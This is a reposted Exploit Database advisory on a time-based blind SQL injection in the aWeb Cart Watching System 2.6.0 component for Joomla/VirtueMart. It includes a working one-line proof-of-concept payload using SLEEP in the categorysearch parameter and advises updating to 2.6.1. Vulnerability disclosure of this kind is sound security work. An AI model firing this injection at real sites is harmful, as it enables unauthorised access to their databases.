Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 – SQL Injection

• Exploit Database
• 19 阅读

• 作者： qemm
  日期： 2016-12-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40973/

• # Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0
  # Date: 28-12-2016
  # Software Link: http://awebsupport.com/products/aweb-cartwatching-system
  # Exploit Author: Javi Espejo(qemm)
  # Contact: http://twitter.com/javiespejo
  # Website: http://raipson.com 
  # CVE: REQUESTED
  # Category: webapps
   
  1. Description
   
  Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave
  This the code that has the parameters with the parameters not sanitized 
  
  2. Proof of Concept
  
  option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries.
   
  3. Solution:
   
  Update to version 2.6.1 from the update center of joomla.
  The Joomla vel publish the vulnerability on
  Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0 
  http://awebsupport.com/